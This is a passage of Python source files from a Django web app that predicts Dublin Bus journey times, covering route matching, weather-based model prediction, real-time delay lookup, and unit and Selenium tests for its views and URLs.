proportion_total = get_percentage_of_route_by_stops(route, num_stops)\n # calculate proportion of route by number of stops instead\n return proportion_total\n\n\ndef get_percentage_of_route_by_stops(route, num_stops):\n df = pd.read_csv('df_routes.csv')\n # retrieve records for a particular line\n df = df.loc[(df['routeid'] == route)]\n total_stops = max(df['progrnumber'])\n proportion_total = num_stops / total_stops\n return proportion_total\n\n\ndef get_stop_num_lat_lng(stop_lat, stop_lng, integer=False):\n \"\"\"function takes stop lat and lng and returns stoppoint id/number match\n\n called if matching by name doesn't work. 
If integer flag=True, returns integer otherwise returns string\n\"\"\"\n    # truncate lat & lng to 3 decimal places for matching (Google and GTFS data don't give the exact same lat/lng for\n    # stops, but are typically the same within 3 decimal places)\n    # e.g. 53.34987 -> 53.349, which is close enough for the two sources to agree\n    stop_lat = float(int(stop_lat * (10 ** 3)) / 10 ** 3)\n    stop_lng = float(int(stop_lng * (10 ** 3)) / 10 ** 3)\n    stop_query = Stop.objects.filter(stop_lat__startswith=stop_lat, stop_lon__startswith=stop_lng).values('stop_name')\n\n    stop_num_list = []\n    for i in range(0, len(stop_query)):\n        current = stop_query[i]['stop_name']\n        stop_num = [int(j) for j in current.split() if j.isdigit()]\n        stop_num_str = ''.join([str(elem) for elem in stop_num])\n        if integer:\n            stop_num_list.append(int(stop_num_str))\n        else:\n            stop_num_list.append(stop_num_str)\n\n    return stop_num_list\n\n\ndef get_stop_num(stop_lat, stop_lng, stop_name, integer=False):\n    \"\"\"function takes stop name string and matches it up to return potential list of stoppoint id/number matches\n    if integer flag is true, return stop ids as list of ints, otherwise returns as list of strings\"\"\"\n\n    # query stops model (GTFS data in DB) for matches with Google response stop name\n    start_stop_query = Stop.objects.filter(stop_name__icontains=stop_name).values('stop_name')\n    # add matches to a list\n    stop_num_list = []\n    for i in range(0, len(start_stop_query)):\n        current = start_stop_query[i]['stop_name']\n        stop_num = [int(j) for j in current.split() if j.isdigit()]\n        stop_num_str = ''.join([str(elem) for elem in stop_num])\n        if integer:\n            stop_num_list.append(int(stop_num_str))\n        else:\n            stop_num_list.append(stop_num_str)\n\n    # If we fail to match stop by name, we attempt to match by lat/lng\n    if len(stop_num_list) == 0:\n        stop_num_list = get_stop_num_lat_lng(stop_lat, stop_lng)\n\n    return stop_num_list\n\n\ndef find_route(arr_stop_lat, arr_stop_lng, dep_stop_lat, dep_stop_lng, departure_stop, arrival_stop, line):\n    \"\"\"takes line, departure stop name/lat/lng, arrival stop name/lat/lng from Google API response and finds a\n    matching Dublin Bus route \"\"\"\n\n    # first retrieve relevant bus stop numbers by matching those in database (GTFS) with the string returned by Google\n    potential_departure_stops = get_stop_num(dep_stop_lat, dep_stop_lng, departure_stop, True)\n    potential_arrival_stops = get_stop_num(arr_stop_lat, arr_stop_lng, arrival_stop, True)\n\n    # read in routes CSV\n    df = pd.read_csv('df_routes.csv')\n\n    # retrieve records for a particular line\n    df = df.loc[(df['lineid'] == line)]\n\n    # Find the route by keeping rows whose stop matches either the departure or arrival candidates,\n    # then picking the subroute that covers the most of them\n    filter1 = df['stoppointid'].isin(potential_departure_stops)\n    filter2 = df['stoppointid'].isin(potential_arrival_stops)\n    df = df[filter1 | filter2]\n    route = df['routeid'].tolist()\n\n    if len(route) == 0:\n        route = None\n    else:\n        route = max(route, key=route.count)\n    return route\n\n\ndef change_timezone(departure_time):\n    \"\"\"time sent from frontend is UTC, change timezone to Dublin\"\"\"\n    dublin = pytz.timezone(\"Europe/Dublin\")\n    dublin_time = parse(departure_time)\n    departure_time = dublin_time.astimezone(dublin)\n    return departure_time\n\n\ndef open_model_and_predict(route, df_all):\n\n    # load the model that corresponds to the route\n    f = open('predictive_models/' + route + '_XG_model.sav', 'rb')\n    model = pickle.load(f)\n    # make predictions\n    predicted_tt = model.predict(df_all)\n    return predicted_tt\n\n\ndef 
is_rush_hour_or_not(route, details, df_all):\n    \"\"\"chooses the rush-hour or off-peak historical proportion for the route\"\"\"\n    if df_all['is_rush_hour'].iat[0]:\n        proportion_of_route = get_proportion_of_route(route, details['departure_stop'], details['num_stops'],\n                                                      details['dep_stop_lat'], details['dep_stop_lng'], details['arrival_stop'], details['arr_stop_lat'], details['arr_stop_lng'], rush_hour=True)\n    else:\n        proportion_of_route = get_proportion_of_route(route, details['departure_stop'], details['num_stops'],\n                                                      details['dep_stop_lat'], details['dep_stop_lng'], details['arrival_stop'], details['arr_stop_lat'], details['arr_stop_lng'])\n    return proportion_of_route\n\n\ndef get_prediction(details):\n    \"\"\"takes journey planner input / Google response and returns predicted travel time \"\"\"\n    # find out which route, and therefore which model is required\n    route = find_route(details['arr_stop_lat'], details['arr_stop_lng'], details['dep_stop_lat'],\n                       details['dep_stop_lng'], details['departure_stop'], details['arrival_stop'], details['line'])\n\n    # if we don't have a model or matching route, return Google's duration prediction instead\n    if route is None:\n        predicted_tt = details['google_pred']\n\n    else:\n        # change timezone from UTC to Irish\n        departure_time = change_timezone(details['departure_time'])\n        # encode features for our model\n        df_bus = encode_features(departure_time)\n\n        # if the departure date and hour are the same as now, we use the current weather, else the forecast for that time\n        now = datetime.now()\n        if departure_time.date() == now.date() and departure_time.hour == now.hour:\n            df_weather = get_current_weather()\n\n        else:\n            df_weather = get_future_weather(departure_time)\n\n        df_all = pd.concat([df_bus, df_weather], axis=1)\n        cols = ['actualtime_dep',\n                'temp',\n                'wind_speed',\n                'humidity',\n                'weather_main_precipitation',\n                'is_term',\n                'is_holiday',\n                'is_rush_hour',\n                'weekday_1',\n                'weekday_2',\n                'weekday_3',\n                'weekday_4',\n                'weekday_5',\n                'weekday_6']\n        df_all = df_all[cols]\n\n        predicted_tt = open_model_and_predict(route, df_all)\n\n        proportion_of_route = is_rush_hour_or_not(route, details, df_all)\n\n        if proportion_of_route is None:\n            # In case proportion_of_route fails, i.e. 
if the arrival or departure stop was not part of the route in 2018\n predicted_tt = details['google_pred']\n else:\n partial_prediction = proportion_of_route * predicted_tt\n predicted_tt_mins = partial_prediction / 60\n predicted_tt = json.dumps(str(predicted_tt_mins))\n\n return predicted_tt\n" }, { "alpha_fraction": 0.8116883039474487, "alphanum_fraction": 0.8116883039474487, "avg_line_length": 29.799999237060547, "blob_id": "81fadbfc7fd6eff8739a698a8b08aa06bae99023", "content_id": "f0dda9e81d5e05fbf19da8a6aadf116220394eff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 308, "license_type": "no_license", "max_line_length": 71, "num_lines": 10, "path": "/Dublin_Bus/Bus/admin.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom .models import Stop, Route, Calendar, CalendarDate, Trip, StopTime\n\n# Register your models here.\nadmin.site.register(Stop)\nadmin.site.register(Route)\nadmin.site.register(Calendar)\nadmin.site.register(CalendarDate)\nadmin.site.register(Trip)\nadmin.site.register(StopTime)\n" }, { "alpha_fraction": 0.6649903059005737, "alphanum_fraction": 0.6649903059005737, "avg_line_length": 33.93243408203125, "blob_id": "6e043e45bb06995d81a93de157c9e8c566933ac5", "content_id": "05d9beda42dbbd5ca50f2dbb71ecfb944bc23123", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2585, "license_type": "no_license", "max_line_length": 119, "num_lines": 74, "path": "/Dublin_Bus/tests/test_urls.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from django.test import SimpleTestCase\nfrom django.urls import reverse, resolve\nfrom Bus.views import index, fetch_arrivals, send_to_model, twitter\nfrom users.views import loginPage, registerPage, logoutUser, favourites, addFavourite, removeFavourite, renameFavourite\n\n\n# Test that basic URLS are functioning properly\nclass TestUrls(SimpleTestCase):\n\n # Test Homepage/Map URL\n def test_index(self):\n url = reverse('index')\n self.assertEquals(url, '/')\n self.assertEquals(resolve(url).func, index)\n\n # Test Twitter Page URL\n def test_twitter(self):\n url = reverse('twitter')\n self.assertEquals(url, '/twitter')\n self.assertEquals(resolve(url).func, twitter)\n\n # Test Real Time Arrivals URL \n def test_arrivals(self):\n url = reverse('arrivaltimes')\n self.assertEquals(url, '/fetch_arrivals/')\n self.assertEquals(resolve(url).func, fetch_arrivals)\n\n # Test Model URL \n def test_model(self):\n url = reverse('model')\n self.assertEquals(url, '/send_to_model')\n self.assertEquals(resolve(url).func, send_to_model)\n\n # Test Login Page URL \n def test_login(self):\n url = reverse('login')\n self.assertEquals(url, '/users/login')\n self.assertEquals(resolve(url).func, loginPage)\n\n # Test Register Page URL \n def test_register(self):\n url = reverse('register')\n self.assertEquals(url, '/users/register')\n self.assertEquals(resolve(url).func, registerPage)\n\n # Test Logout URL \n def test_logout(self):\n url = reverse('logout')\n self.assertEquals(url, '/users/logout')\n self.assertEquals(resolve(url).func, logoutUser)\n\n # Test Favourites Page URL\n def test_favourites(self):\n url = reverse('favourites')\n self.assertEquals(url, '/users/favourites')\n self.assertEquals(resolve(url).func, favourites)\n\n # Test Add Favourite URL\n def test_add_favourite(self):\n url = reverse('addFavourite')\n self.assertEquals(url, 
'/users/favourites/add')\n        self.assertEquals(resolve(url).func, addFavourite)\n\n    # Test Remove Favourite URL \n    def test_remove_favourite(self):\n        url = reverse('removeFavourite')\n        self.assertEquals(url, '/users/favourites/remove')\n        self.assertEquals(resolve(url).func, removeFavourite)\n\n    # Test Rename Favourite URL \n    def test_rename_favourite(self):\n        url = reverse('renameFavourite')\n        self.assertEquals(url, '/users/favourites/rename')\n        self.assertEquals(resolve(url).func, renameFavourite)\n" }, { "alpha_fraction": 0.5614035129547119, "alphanum_fraction": 0.5719298124313354, "avg_line_length": 23.75, "blob_id": "6af36bcc4569dc7c1f4d5a0f24fb643b96ecee39", "content_id": "4d479eedb9da9af07afd62a501e8dc71b3a8b86a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 285, "license_type": "no_license", "max_line_length": 47, "num_lines": 12, "path": "/setup.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from setuptools import setup\n\nsetup(name=\"Dublin_Bus\",\n      version=\"0.1\",\n      description=\"Dublin Bus Web Application\",\n      url=\"https://www.bustimate.com\",\n      author=\"Rachel Courtney, Andrew McClean, Amanda Hegarty\",\n      author_email=\"\",\n      license=\"GPL3\",\n      packages=['config'],\n\n      )\n" }, { "alpha_fraction": 0.5937984585762024, "alphanum_fraction": 0.5990697741508484, "avg_line_length": 36.5, "blob_id": "73dd0c67cf693713fd98bcc506b0610d45da2d64", "content_id": "4e77abc6a8519318f07a2356b744c71097b02836", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3225, "license_type": "no_license", "max_line_length": 112, "num_lines": 86, "path": "/Dublin_Bus/Bus/gtfsrealtime.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "import json\nfrom datetime import datetime, date, timedelta\nfrom django.conf import settings\nfrom .serializers import StopTimeSerializer\nfrom .models import Stop, Trip, Calendar, Route, StopTime, CalendarDate\n\n\ndef read_real_time():\n    with open('json/real_time_data.json') as json_file:\n        data = json.load(json_file)\n    return data\n\n\ndef is_trip_affected(tripid, stopid):\n    \"\"\"when a user clicks on a marker, sends the next 3 timetabled arrivals according to GTFS and returns any delays\n    reported by GTFS-R \"\"\"\n    data = read_real_time()\n    if 'entity' in data:\n        for i in range(0, len(data['entity'])):\n            if data['entity'][i][\"id\"] == tripid:\n                stop_time_update = data['entity'][i][\"trip_update\"]['stop_time_update']\n                for j in range(0, len(stop_time_update)):\n                    if stop_time_update[j]['stop_id'] == stopid:\n                        if 'arrival' in stop_time_update[j]:\n                            delay_in_seconds = stop_time_update[j]['arrival']['delay']\n                            return delay_in_seconds\n                        else:\n                            if 'departure' in stop_time_update[j]:\n                                delay_in_seconds = stop_time_update[j]['departure']['delay']\n                                return delay_in_seconds\n    # if no delay or matching entry in GTFS-R, return 0\n    return 0\n\n\ndef get_arrivals(stop_pk):\n    \"\"\" returns next 3 arrivals for a given stop \"\"\"\n    today_int = datetime.today().weekday()\n    day_names = ['monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'sunday']\n    today = day_names[today_int]\n\n    results = {}\n\n    today_date = date.today()\n    today_str = today_date.strftime(\"%Y%m%d\")\n    now = datetime.now().time()\n    print(now)\n    two_hours = 
datetime.now() + timedelta(hours=2)\n two_hours_from_now = two_hours.time()\n\n # This can probably be neater?\n # MySQL doesn't optimise nested queries very well, calling list() on queries forces execution\n\n stop_time_query = StopTime.objects.filter(stop_id=stop_pk, arrival_time__gt=now)\n calendar_date_query = CalendarDate.objects.only('service_id').filter(date=today_str)\n calendar_query = Calendar.objects.filter(start_date__lt=today_str, end_date__gt=today_str).filter(\n **{today: 1}).exclude(\n service_id__in=calendar_date_query)\n trip_query = Trip.objects.filter(stoptime__in=list(stop_time_query), service_id__in=list(calendar_query))\n stop_time = stop_time_query.filter(trip_id__in=list(trip_query)).order_by('arrival_time')\n\n delays = []\n trip = stop_time.values('trip_id')\n if len(trip) < 3:\n upper_range = len(trip)\n else:\n upper_range = 3\n for i in range(0, upper_range):\n delay = is_trip_affected(trip[i]['trip_id'], stop_pk)\n delays.append(delay)\n\n arrivals = StopTimeSerializer(stop_time[:upper_range], many=True)\n results['timetable'] = arrivals.data\n results['delays'] = delays\n return results\n" }, { "alpha_fraction": 0.5988840460777283, "alphanum_fraction": 0.6026038527488708, "avg_line_length": 30.7783260345459, "blob_id": "3ec8018b66e3259bf2b05e8bf5c165fba736a1cc", "content_id": "95cc30207b1073974adf20655e05102e0d0938c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6452, "license_type": "no_license", "max_line_length": 88, "num_lines": 203, "path": "/Dublin_Bus/functional_tests/tests_base.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.webdriver import WebDriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom django.contrib.staticfiles.testing import StaticLiveServerTestCase\n\nfrom users.models import favourite\nfrom django.urls import reverse\nfrom django.contrib import auth\n\nUser = auth.get_user_model()\n\n\nclass BaseFunctionalTests(StaticLiveServerTestCase):\n def setUp(self):\n self.browser = webdriver.Chrome('functional_tests/chromedriver.exe')\n demo_user = User(username='myname', email='[email protected]')\n demo_user.is_staff = True\n demo_user.is_superuser = True\n self.demo_passwd = 'password'\n demo_user.set_password(self.demo_passwd)\n demo_user.save()\n self.demo_user = demo_user\n\n self.index_url = self.live_server_url + reverse(\"index\")\n self.login_url = self.live_server_url + reverse(\"login\")\n self.register_url = self.live_server_url + reverse(\"register\")\n self.favourite_url = self.live_server_url + reverse(\"favourites\")\n self.twitter_url = self.live_server_url + reverse(\"twitter\")\n\n def test_navbar_index(self):\n self.browser.get(self.login_url)\n wait = WebDriverWait(self.browser, 100)\n\n self.browser.find_element_by_id('menuButton').click()\n\n try:\n wait.until(\n EC.element_to_be_clickable((By.ID, \"indexLink\"))\n )\n finally:\n self.browser.find_element_by_id('indexLink').click()\n\n self.assertEquals(\n self.browser.current_url,\n self.index_url\n )\n\n def test_navbar_twitter(self):\n self.browser.get(self.index_url)\n wait = WebDriverWait(self.browser, 100)\n\n self.browser.find_element_by_id('menuButton').click()\n\n try:\n 
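# give the menu a moment to open: wait until the link is clickable before following it\n            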
wait.until(\n EC.element_to_be_clickable((By.ID, \"twitterLink\"))\n )\n finally:\n self.browser.find_element_by_id('twitterLink').click()\n\n self.assertEquals(\n self.browser.current_url,\n self.twitter_url\n )\n\n def test_navbar_login(self):\n self.browser.get(self.index_url)\n wait = WebDriverWait(self.browser, 100)\n\n self.browser.find_element_by_id('menuButton').click()\n\n try:\n wait.until(\n EC.element_to_be_clickable((By.ID, \"loginLink\"))\n )\n finally:\n self.browser.find_element_by_id('loginLink').click()\n\n self.assertEquals(\n self.browser.current_url,\n self.login_url\n )\n\n def test_navbar_register(self):\n self.browser.get(self.index_url)\n wait = WebDriverWait(self.browser, 100)\n\n self.browser.find_element_by_id('menuButton').click()\n\n try:\n wait.until(\n EC.element_to_be_clickable((By.ID, \"registerLink\"))\n )\n finally:\n self.browser.find_element_by_id('registerLink').click()\n\n self.assertEquals(\n self.browser.current_url,\n self.register_url\n )\n\n def test_navbar_favourites(self):\n self.browser.get(self.index_url)\n wait = WebDriverWait(self.browser, 100)\n\n self.browser.find_element_by_id('menuButton').click()\n\n try:\n wait.until(\n EC.element_to_be_clickable((By.ID, \"favouritesLink\"))\n )\n finally:\n self.browser.find_element_by_id('favouritesLink').click()\n\n self.assertEquals(\n self.browser.current_url,\n self.login_url + \"?next=/users/favourites\"\n )\n\n def test_navbar_favourites_loggedIn(self):\n self.browser.get(self.login_url)\n wait = WebDriverWait(self.browser, 100)\n\n self.browser.find_element_by_name(\"username\").send_keys(self.demo_user.username)\n self.browser.find_element_by_name(\"password\").send_keys(self.demo_passwd)\n self.browser.find_element_by_id('submitButton').click()\n\n self.browser.find_element_by_id('menuButton').click()\n\n try:\n wait.until(\n EC.element_to_be_clickable((By.ID, \"favouritesLink\"))\n )\n finally:\n self.browser.find_element_by_id('favouritesLink').click()\n\n self.assertEquals(\n self.browser.current_url,\n self.favourite_url\n )\n\n def test_navbar_logout(self):\n self.browser.get(self.login_url)\n wait = WebDriverWait(self.browser, 100)\n\n self.browser.find_element_by_name(\"username\").send_keys(self.demo_user.username)\n self.browser.find_element_by_name(\"password\").send_keys(self.demo_passwd)\n self.browser.find_element_by_id('submitButton').click()\n\n self.browser.find_element_by_id('menuButton').click()\n\n try:\n wait.until(\n EC.element_to_be_clickable((By.ID, \"logoutLink\"))\n )\n finally:\n self.browser.find_element_by_id('logoutLink').click()\n\n self.assertEquals(\n self.browser.current_url,\n self.login_url\n )\n\n self.assertTrue(\n self.browser.find_element_by_id('loginButton').is_displayed()\n #idExists(self, 'loginButton')\n )\n\n\n\n def test_loginButton(self):\n self.browser.get(self.index_url)\n\n self.browser.find_element_by_id('loginButton').click()\n\n self.assertEquals(\n self.browser.current_url,\n self.login_url\n )\n\n def test_logoutButton(self):\n self.browser.get(self.login_url)\n wait = WebDriverWait(self.browser, 100)\n\n self.browser.find_element_by_name(\"username\").send_keys(self.demo_user.username)\n self.browser.find_element_by_name(\"password\").send_keys(self.demo_passwd)\n self.browser.find_element_by_id('submitButton').click()\n\n self.browser.find_element_by_id('logoutButton').click()\n\n self.assertEquals(\n self.browser.current_url,\n self.login_url\n )\n\n self.assertTrue(\n self.browser.find_element_by_id('loginButton').is_displayed()\n 
#idExists(self, 'loginButton')\n )\n\n" }, { "alpha_fraction": 0.5948766469955444, "alphanum_fraction": 0.6375711560249329, "avg_line_length": 31.9375, "blob_id": "50dfa2d74af7a0dd5650d48969ed95fc9ecf3493", "content_id": "dbc3ceeb8d700b5c234da2e84ec254c667b2d0c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1054, "license_type": "no_license", "max_line_length": 74, "num_lines": 32, "path": "/Dublin_Bus/tests/test_models.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from django.db.models.query_utils import select_related_descend\nfrom django.test.testcases import TestCase\nfrom users.models import favourite\nfrom Bus.models import Stop, Trip, Calendar, Route, StopTime, CalendarDate\nfrom django.contrib import auth\n\nUser = auth.get_user_model()\n\n\nclass TestModels(TestCase):\n def setUp(self):\n user1 = User(username='myname', email='[email protected]')\n user1.is_staff = True\n user1.is_superuser = True\n self.passwd = 'password'\n user1.set_password(self.passwd)\n user1.save()\n self.user1 = user1\n\n self.favourite1 = favourite.objects.create(\n user_id=self.user1.pk,\n origin_name='Shankill, Dublin, Ireland',\n origin_lat=53.2332663,\n origin_lon=-6.1237578,\n destin_name='East Wall, Dublin, Ireland',\n destin_lat=53.3543216,\n destin_lon=-6.2341133,\n stops=0\n )\n\n def test_favourite_given_name(self):\n self.assertEquals(self.favourite1.favourite_name, \"Saved Route\")\n" }, { "alpha_fraction": 0.603453516960144, "alphanum_fraction": 0.6225550174713135, "avg_line_length": 39.98538589477539, "blob_id": "ed7bb89eebb3601a40c9217ab4f84f036ee4286c", "content_id": "f8fd31049ce3cf9abedd5ce522595f7e5eb34c5b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19632, "license_type": "no_license", "max_line_length": 108, "num_lines": 479, "path": "/Dublin_Bus/tests/test_views.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from datetime import date\nfrom django.http import response\nfrom django.test import TestCase, TransactionTestCase\nfrom django.urls import reverse\nfrom django.urls.base import resolve\nfrom django.contrib import auth\nfrom Bus.models import Stop, Trip, Calendar, Route, StopTime, CalendarDate\nfrom users.models import favourite\n\nimport json\n\nUser = auth.get_user_model()\n\n\nclass TestViews(TransactionTestCase):\n\n def setUp(self):\n # Set up User\n demo_user = User(username='myname', email='[email protected]')\n demo_user.is_staff = True\n demo_user.is_superuser = True\n self.demo_passwd = 'password'\n demo_user.set_password(self.demo_passwd)\n demo_user.save()\n self.demo_user = demo_user\n\n #create favourite\n demo_favourite = favourite(user_id = self.demo_user.pk,\n origin_name= 'Shankill, Dublin, Ireland',\n origin_lat = 53.2332663, \n origin_lon = -6.1237578, \n destin_name = 'East Wall, Dublin, Ireland', \n destin_lat = 53.3543216, \n destin_lon = -6.2341133,\n stops = 0\n )\n\n demo_favourite.save()\n self.demo_favourite = demo_favourite\n return super().setUp()\n\n \"\"\"========================= Testing existence of new demo objects =========================\"\"\"\n\n def test_demo_user_exists(self):\n self.assertEqual(User.objects.all().count(), 1)\n self.assertTrue(self.demo_user.check_password(self.demo_passwd))\n self.assertTrue(self.demo_user.is_staff)\n self.assertTrue(self.demo_user.is_superuser)\n self.assertEqual(self.demo_user.username, 'myname')\n 
self.assertEqual(self.demo_user.email, '[email protected]')\n\n    # Check demo_favourite was created\n    def test_demo_favourite(self):\n        self.assertEqual(favourite.objects.all().count(), 1)\n        self.assertEqual(self.demo_favourite.user, self.demo_user)\n        self.assertEqual(self.demo_favourite.origin_name, 'Shankill, Dublin, Ireland')\n        self.assertEqual(self.demo_favourite.origin_lat, 53.2332663)\n        self.assertEqual(self.demo_favourite.origin_lon, -6.1237578)\n        self.assertEqual(self.demo_favourite.destin_name, 'East Wall, Dublin, Ireland')\n        self.assertEqual(self.demo_favourite.destin_lat, 53.3543216)\n        self.assertEqual(self.demo_favourite.destin_lon, -6.2341133)\n        self.assertEqual(self.demo_favourite.stops, 0)\n\n    \"\"\"========================= Testing index view =========================\"\"\"\n\n    def test_index_GET(self):\n        response = self.client.get(reverse('index'))\n        self.assertEquals(response.status_code, 200)\n        self.assertTemplateUsed(response, 'Bus/index.html')\n\n    def test_index_POST(self):\n        response = self.client.post(reverse('index'))\n        self.assertEquals(response.status_code, 200)\n        self.assertTemplateUsed(response, 'Bus/index.html')\n\n    \"\"\"========================= Testing twitter view =========================\"\"\"\n\n    def test_twitter_GET(self):\n        response = self.client.get(reverse('twitter'))\n        self.assertEquals(response.status_code, 200)\n        self.assertTemplateUsed(response, 'Bus/twitter.html')\n\n    \"\"\"========================= Testing fetch_arrivals view =========================\"\"\"\n\n    def test_arrivalTimes_GET(self):\n        response = self.client.get(reverse('arrivaltimes'), follow=True)\n        redirect_path = response.request.get(\"PATH_INFO\")\n\n        self.assertEquals(response.status_code, 200)\n        self.assertEquals(redirect_path, reverse('index'))\n\n    \"\"\"========================= Testing send_to_model view =========================\"\"\"\n\n    def test_model_GET(self):\n        response = self.client.get(reverse('model'), follow=True)\n        redirect_path = response.request.get(\"PATH_INFO\")\n\n        self.assertEquals(response.status_code, 200)\n        self.assertEquals(redirect_path, reverse('index'))\n\n\n\n    \"\"\"========================= Testing registerPage view =========================\"\"\"\n\n    def test_register_GET(self):\n        response = self.client.get(reverse('register'))\n\n        self.assertEquals(response.status_code, 200)\n        self.assertTemplateUsed(response, 'users/register.html')\n\n    def test_register_loggedin_GET(self):\n        self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n        response = self.client.get(reverse('register'), follow=True)\n        redirect_path = response.request.get(\"PATH_INFO\")\n\n        self.assertEquals(response.status_code, 200)\n        self.assertEquals(redirect_path, reverse('index'))\n\n    # Check if a new user can be registered\n    def test_register_user(self):\n        new_user = {\n            'username': 'newguy',\n            'email': '[email protected]',\n            'password1': 'testing1234',\n            'password2': 'testing1234'\n        }\n        response = self.client.post(reverse('register'), new_user, follow=True)\n        redirect_path = response.request.get(\"PATH_INFO\")\n\n        # check redirected to login page\n        self.assertEquals(response.status_code, 200)\n        self.assertEquals(redirect_path, reverse('login'))\n\n        # Check new user is created\n        self.assertEqual(User.objects.all().count(), 2)\n\n        # Check new account message\n        messages = list(response.context['messages'])\n        self.assertEqual(len(messages), 1)\n        self.assertEqual(str(messages[0]), 'Account created for ' + new_user['username'] + '.')\n\n    # Check that invalid user input 
fails to register new user\n def test_register_fail(self):\n invalid_user = {\n 'username': 'myname',\n 'email': '[email protected]',\n 'password1': 'testing1234',\n 'password2': 'password9876'\n }\n response = self.client.post(reverse('register'), invalid_user, follow=True)\n redirect_path = response.request.get(\"PATH_INFO\")\n\n # Check that you are redirected back to register page\n self.assertEquals(response.status_code, 200)\n self.assertEquals(redirect_path, reverse('register'))\n\n # Check that a new user is not created\n self.assertEqual(User.objects.all().count(), 1)\n\n # Check that error messages exist\n messages = list(response.context['messages'])\n self.assertTrue(len(messages) > 0)\n\n \"\"\"========================= Testing loginPage view =========================\"\"\"\n\n def test_login_GET(self):\n response = self.client.get(reverse('login'))\n\n self.assertEquals(response.status_code, 200)\n self.assertTemplateUsed(response, 'users/login.html')\n\n def test_login_loggedin_GET(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n response = self.client.get(reverse('login'), follow=True)\n redirect_path = response.request.get(\"PATH_INFO\")\n\n self.assertEquals(response.status_code, 200)\n self.assertEquals(redirect_path, reverse('index'))\n\n def test_login_user(self):\n login_details = {\n \"username\": self.demo_user.username,\n \"password\": self.demo_passwd\n }\n response = self.client.post(reverse('login'), login_details, follow=True)\n redirect_path = response.request.get(\"PATH_INFO\")\n\n # Check successful redirect\n self.assertEquals(response.status_code, 200)\n self.assertEquals(redirect_path, reverse('index'))\n\n # check user is now logged in\n user = auth.get_user(self.client)\n assert user.is_authenticated\n\n # Check failed login attempt\n def test_login_fail(self):\n login_details = {\n \"username\": self.demo_user.username,\n \"password\": \"wrong password\"\n }\n response = self.client.post(reverse('login'), login_details, follow=True)\n redirect_path = response.request.get(\"PATH_INFO\")\n\n # redirected back to login\n self.assertEquals(response.status_code, 200)\n self.assertEquals(redirect_path, reverse('login'))\n\n # Check that error messages exist\n messages = list(response.context['messages'])\n self.assertTrue(len(messages) > 0)\n\n # check user is not logged in\n user = auth.get_user(self.client)\n assert not user.is_authenticated\n\n \"\"\"========================= Testing logoutUser view =========================\"\"\"\n\n def test_logout_GET(self):\n response = self.client.get(reverse('logout'), follow=True)\n redirect_path = response.request.get(\"PATH_INFO\")\n\n self.assertEquals(response.status_code, 200)\n self.assertEquals(redirect_path, reverse('login'))\n\n def test_logout(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n response = self.client.get(reverse('logout'), follow=True)\n redirect_path = response.request.get(\"PATH_INFO\")\n\n self.assertEquals(response.status_code, 200)\n self.assertEquals(redirect_path, reverse('login'))\n\n # check user is now logged out\n user = auth.get_user(self.client)\n assert not user.is_authenticated\n\n \"\"\"========================= Testing favourites view =========================\"\"\"\n\n def test_favourites_GET(self):\n response = self.client.get(reverse('favourites'), follow=True)\n redirect_path = response.request.get(\"PATH_INFO\")\n\n self.assertEquals(response.status_code, 200)\n 
self.assertEquals(redirect_path, reverse('login'))\n\n def test_favourites_loggedin_GET(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n response = self.client.get(reverse('favourites'))\n\n self.assertEquals(response.status_code, 200)\n self.assertTemplateUsed(response, 'users/favourites.html')\n\n \"\"\"========================= Testing addFavourites view =========================\"\"\"\n\n def test_addFavourite_GET(self):\n response = self.client.get(reverse('addFavourite'), follow=True)\n redirect_path = response.request.get(\"PATH_INFO\")\n\n self.assertEquals(response.status_code, 200)\n self.assertEquals(redirect_path, reverse('login'))\n\n def test_addFavourite_loggedin_GET(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n response = self.client.get(reverse('addFavourite'), follow=True)\n redirect_path = response.request.get(\"PATH_INFO\")\n\n self.assertEquals(response.status_code, 200)\n self.assertEquals(redirect_path, reverse('index'))\n\n # Adding a Favourite\n def test_addFavourite(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n new_favourite = {\n 'user': self.demo_user.pk,\n 'origin_name': 'Dorset Street Lower, stop 14',\n 'origin_lat': 53.358531237878196,\n 'origin_lon': -6.2627765057086595,\n 'destin_name': 'Parnell Square West, stop 3',\n 'destin_lat': 53.352308551434895,\n 'destin_lon': -6.26381074216821,\n 'stops': 1\n }\n response = self.client.post(reverse('addFavourite'), json.dumps(new_favourite), content_type=\"json\")\n data = json.loads(response.content)\n self.assertEquals(data['success'], True)\n self.assertEquals(data['result'], \"Favourite added.\")\n\n # Check new favourite details are correct\n data['favourite'].pop('id')\n data['favourite'].pop('favourite_name')\n self.assertEquals(data['favourite'], new_favourite)\n\n # Check new favourite is created\n self.assertEqual(favourite.objects.all().count(), 2)\n\n def test_addFavourite_nonexistent_user(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n bad_favourite = {\n 'user': 